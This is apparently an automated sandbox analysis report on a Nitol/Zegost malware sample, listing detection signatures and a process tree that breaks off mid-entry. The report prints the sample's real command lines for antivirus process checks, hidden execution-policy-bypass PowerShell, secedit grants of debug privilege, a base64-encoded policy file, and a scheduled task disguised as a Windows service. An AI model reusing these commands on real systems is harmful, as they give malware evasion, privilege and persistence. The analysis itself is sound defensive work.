Windows
Analysis Report
KL-3.1.16.exe
Overview
General Information
Detection
Nitol, Zegost
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Nitol
Yara detected Zegost
Bypasses PowerShell execution policy
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Encrypted powershell cmdline option found
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution from Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Suspicious powershell command line found
Tries to delay execution (extensive OutputDebugStringW loop)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
KL-3.1.16.exe (PID: 6676 cmdline:
"C:\Users\ user\Deskt op\KL-3.1. 16.exe" MD5: B73B22BE36F4783BD6A970A9162A577B) irsetup.exe (PID: 5428 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\_ir_sf _temp_0\ir setup.exe" __IRAOFF: 7589746 "_ _IRAFN:C:\ Users\user \Desktop\K L-3.1.16.e xe" "__IRC T:3" "__IR TSS:0" "__ IRSID:S-1- 5-21-22461 22658-3693 405117-247 6756634-10 02" MD5: 2A7D5F8D3FB4AB753B226FD88D31453B) powershell.exe (PID: 2304 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"360tra y.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 5848 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 2472 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"360Tra y.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 4280 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 2844 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"msmpen g.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 6772 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 3744 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"securi tyhealthsy stray.exe\ ")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 1420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 824 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"mpcopy accelerato r.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 6952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 1196 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"MpDefe nderCoreSe rvice.exe\ ")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2304 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 3696 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $mypid=(Ge t-WmiObjec t -Query ' select Par entProcess Id from Wi n32_Proces s where Pr ocessId=54 28').Paren tProcessId ;if($mypid ){Stop-Pro cess -Id $ mypid -For ce;} MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 6752 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 4408 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy Byp ass -NoPro file -Wind owStyle Hi dden -Comm and "funct ion Test-P EFile { p aram([stri ng]$Litera lPath) if (-not [IO .File]::Ex ists($Lite ralPath)) { return $ false } $ fileInfo = Get-Item -LiteralPa th $Litera lPath -Err orAction S ilentlyCon tinue if ($null -eq $fileInfo ) { return $false } [uint16]$ IMAGE_DOS_ SIGNATURE = 0x5A4D [uint32]$I MAGE_NT_SI GNATURE = 0x00004550 [uint16] $IMAGE_NT_ OPTIONAL_H DR32_MAGIC = 0x10b [uint16]$I MAGE_NT_OP TIONAL_HDR 64_MAGIC = 0x20b [u int32]$IMA GE_SIZEOF_ DOS_HEADER = 64 [ui nt32]$IMAG E_SIZEOF_F ILE_HEADER = 20 [ui nt32]$IMAG E_SIZEOF_O PTIONAL_HE ADER32 = 2 24 [uint3 2]$IMAGE_S IZEOF_OPTI ONAL_HEADE R64 = 240 [uint32]$ IMAGE_SIZE OF_NT_HEAD ERS32 = 24 8 # 4 + $I MAGE_SIZEO F_FILE_HEA DER + $IMA GE_SIZEOF_ OPTIONAL_H EADER32 [ uint32]$IM AGE_SIZEOF _NT_HEADER S64 = 264 # 4 + $IMA GE_SIZEOF_ FILE_HEADE R + $IMAGE _SIZEOF_OP TIONAL_HEA DER64 try { $stre am = New-O bject Syst em.IO.File Stream -Ar gumentList ($Literal Path, [IO. FileMode]: :Open, [IO .FileAcces s]::Read, [IO.FileSh are]::Read ) $binRe ader = New -Object Sy stem.IO.Bi naryReader -Argument List ($str eam) $e_ magick = $ binReader. ReadUInt16 () if ($ e_magick - ne $IMAGE_ DOS_SIGNAT URE) { ret urn $false } $null = $stream .Seek(60, [IO.SeekOr igin]::Beg in) $e_l fanew = $b inReader.R eadUInt32( ) $null = $stream. Seek($e_lf anew, [IO. SeekOrigin ]::Begin) $nt_sign ature = $b inReader.R eadUInt32( ) if ($n t_signatur e -ne $IMA GE_NT_SIGN ATURE) { r eturn $fal se } $nu ll = $stre am.Seek($e _lfanew + 4 + $IMAGE _SIZEOF_FI LE_HEADER, [IO.SeekO rigin]::Be gin) $op tional_hea der_magic = $binRead er.ReadUIn t16() if ($optiona l_header_m agic -eq $ IMAGE_NT_O PTIONAL_HD R32_MAGIC) { $siz e_dos_nt_h eaders = $ e_lfanew + $IMAGE_SI ZEOF_NT_HE ADERS32 } elseif ( $optional_ header_mag ic -eq $IM AGE_NT_OPT IONAL_HDR6 4_MAGIC) { $size_ dos_nt_hea ders = $e_ lfanew + $ IMAGE_SIZE OF_NT_HEAD ERS64 } else { ret urn $false } if ($ fileInfo.L ength -lt $size_dos_ nt_headers ) { return $false } return $ true } ca tch { re turn $fals e } final ly { if ($binReade r) { $binR eader.Clos e() } if ($stream) { $stream .Close() } } } if(T est-PEFile \"C:\User s\Public\D ocuments\k mPNd7Pn\wD mQx8s.exe\ "){exit 0} else{exit 1} " MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2304 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 1184 cmdline:
"C:\Window s\System32 \cmd.exe" /c start " title" "C: \Users\Pub lic\Docume nts\kmPNd7 Pn\wDmQx8s .exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) conhost.exe (PID: 4828 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) wDmQx8s.exe (PID: 4020 cmdline:
"C:\Users\ Public\Doc uments\kmP Nd7Pn\wDmQ x8s.exe" MD5: 3F96AB04AC85E27D6F6E9FBCFE1317C2) powershell.exe (PID: 3412 cmdline:
powershell .exe -NoPr ofile -C " Set-Conten t -Value @ ('[Unicode ]','Unicod e=yes','[V ersion]',' signature= \"$CHICAGO $\"','Revi sion=1','[ Privilege Rights]',' SeDebugPri vilege = * S-1-5-18', '[File Sec urity]','\ "C:\Progra mData\Prog ram\",0,\" D:AR(D;OIC I;DTSDRCWD ;;;WD)\"') -Path ([I O.Path]::C ombine($en v:TEMP, 'S eDebugPriv ilege1.inf ')) -Encod ing Unicod e; secedit .exe /conf igure /db ([IO.Path] ::Combine( $env:TEMP, 'SeDebugP rivilege1. sdb')) /cf g ([IO.Pat h]::Combin e($env:TEM P, 'SeDebu gPrivilege 1.inf')) / overwrite /log ([IO. Path]::Com bine($env: TEMP, 'SeD ebugPrivil ege1.log') ) /quiet; Remove-Ite m -Path ([ IO.Path]:: Combine($e nv:TEMP, ' SeDebugPri vilege1.*' )) -Force; " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 6676 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) SecEdit.exe (PID: 7320 cmdline:
"C:\Window s\system32 \SecEdit.e xe" /confi gure /db C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege1. sdb /cfg C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege1. inf /overw rite /log C:\Users\u ser\AppDat a\Local\Te mp\SeDebug Privilege1 .log /quie t MD5: BFC13856291E4B804D33BBAEFC8CB3B5) powershell.exe (PID: 2424 cmdline:
powershell .exe -NoPr ofile -C " Set-Conten t -Value @ ('[Unicode ]','Unicod e=yes','[V ersion]',' signature= \"$CHICAGO $\"','Revi sion=1','[ Privilege Rights]',' SeDebugPri vilege = * S-1-5-18', '[File Sec urity]','\ "C:\Progra mData\Data \",0,\"D:A R(D;OICI;D TSDRCWD;;; WD)\"') -P ath ([IO.P ath]::Comb ine($env:T EMP, 'SeDe bugPrivile ge3.inf')) -Encoding Unicode; secedit.ex e /configu re /db ([I O.Path]::C ombine($en v:TEMP, 'S eDebugPriv ilege3.sdb ')) /cfg ( [IO.Path]: :Combine($ env:TEMP, 'SeDebugPr ivilege3.i nf')) /ove rwrite /lo g ([IO.Pat h]::Combin e($env:TEM P, 'SeDebu gPrivilege 3.log')) / quiet; Rem ove-Item - Path ([IO. Path]::Com bine($env: TEMP, 'SeD ebugPrivil ege3.*')) -Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 2896 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) SecEdit.exe (PID: 7348 cmdline:
"C:\Window s\system32 \SecEdit.e xe" /confi gure /db C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege3. sdb /cfg C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege3. inf /overw rite /log C:\Users\u ser\AppDat a\Local\Te mp\SeDebug Privilege3 .log /quie t MD5: BFC13856291E4B804D33BBAEFC8CB3B5) powershell.exe (PID: 1440 cmdline:
powershell .exe -NoPr ofile -C " [IO.File]: :WriteAllB ytes([IO.P ath]::Comb ine($env:T EMP, 'SeDe bugPrivile ge4.inf'), [Convert] ::FromBase 64String(' //5bAFUAbg BpAGMAbwBk AGUAXQANAA oAVQBuAGkA YwBvAGQAZQ A9AHkAZQBz AA0ACgBbAF YAZQByAHMA aQBvAG4AXQ ANAAoAcwBp AGcAbgBhAH QAdQByAGUA PQAiACQAQw BIAEkAQwBB AEcATwAkAC IADQAKAFIA ZQB2AGkAcw BpAG8AbgA9 ADEADQAKAF sAUAByAGkA dgBpAGwAZQ BnAGUAIABS AGkAZwBoAH QAcwBdAA0A CgBTAGUARA BlAGIAdQBn AFAAcgBpAH YAaQBsAGUA ZwBlACAAPQ AgACoAUwAt ADEALQA1AC 0AMQA4AA0A CgA=')); s ecedit.exe /configur e /db ([IO .Path]::Co mbine($env :TEMP, 'Se DebugPrivi lege4.sdb' )) /cfg ([ IO.Path]:: Combine($e nv:TEMP, ' SeDebugPri vilege4.in f')) /over write /log ([IO.Path ]::Combine ($env:TEMP , 'SeDebug Privilege4 .log')) /q uiet; Remo ve-Item -P ath ([IO.P ath]::Comb ine($env:T EMP, 'SeDe bugPrivile ge4.*')) - Force;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 6752 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) SecEdit.exe (PID: 7276 cmdline:
"C:\Window s\system32 \SecEdit.e xe" /confi gure /db C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege4. sdb /cfg C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege4. inf /overw rite /log C:\Users\u ser\AppDat a\Local\Te mp\SeDebug Privilege4 .log /quie t MD5: BFC13856291E4B804D33BBAEFC8CB3B5) powershell.exe (PID: 5480 cmdline:
powershell .exe -NoPr ofile -C " Set-Conten t -Value @ ('[Unicode ]','Unicod e=yes','[V ersion]',' signature= \"$CHICAGO $\"','Revi sion=1','[ Privilege Rights]',' SeDebugPri vilege = * S-1-5-18', '[File Sec urity]','\ "C:\Progra mData\Prog ram\",0,\" D:AR(D;OIC I;DTSDRCWD ;;;WD)\"') -Path ([I O.Path]::C ombine($en v:TEMP, 'S eDebugPriv ilege1.inf ')) -Encod ing Unicod e; secedit .exe /conf igure /db ([IO.Path] ::Combine( $env:TEMP, 'SeDebugP rivilege1. sdb')) /cf g ([IO.Pat h]::Combin e($env:TEM P, 'SeDebu gPrivilege 1.inf')) / overwrite /log ([IO. Path]::Com bine($env: TEMP, 'SeD ebugPrivil ege1.log') ) /quiet; Remove-Ite m -Path ([ IO.Path]:: Combine($e nv:TEMP, ' SeDebugPri vilege1.*' )) -Force; " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) conhost.exe (PID: 6952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) SecEdit.exe (PID: 7368 cmdline:
"C:\Window s\system32 \SecEdit.e xe" /confi gure /db C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege1. sdb /cfg C :\Users\us er\AppData \Local\Tem p\SeDebugP rivilege1. inf /overw rite /log C:\Users\u ser\AppDat a\Local\Te mp\SeDebug Privilege1 .log /quie t MD5: BFC13856291E4B804D33BBAEFC8CB3B5) cmd.exe (PID: 7204 cmdline:
cmd /c ech o.>c:\inst .ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 7224 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 7832 cmdline:
cmd.exe /c schtasks. exe /creat e /tn "Win dows Audio Endpoint Builder( )" /xm l "C:\Prog ramData\Mi crosoft\Mi crosoftNet Framework. xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 7844 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) schtasks.exe (PID: 7880 cmdline:
schtasks.e xe /create /tn "Wind ows Audio Endpoint B uilder( )" /xml "C:\Progr amData\Mic rosoft\Mic rosoftNetF ramework.x ml MD5: 48C2FE20575769DE916F48EF0676A965) powershell.exe (PID: 7388 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7396 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7928 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7936 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 8132 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 8140 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7276 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7324 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7880 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7440 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7876 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7872 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7952 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7944 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 3284 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2380 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 3588 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 5292 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6576 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2472 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 3488 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 3192 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7172 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7308 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 2896 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 3428 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7888 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7468 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 940 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7856 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 5624 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 4476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 5100 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2300 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 4812 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 3636 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6412 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 6464 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6928 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 6884 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6292 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 6328 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 1832 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 5652 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 8180 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 3408 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 2044 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7256 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 6684 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 480 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 1888 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2472 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7528 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7656 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 3616 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 6632 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 5144 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" Get-Proces s ([IO.Pat h]::GetFil eNameWitho utExtensio n(\"wDmQx8 s.exe\")); MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 5324 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 7436 cmdline:
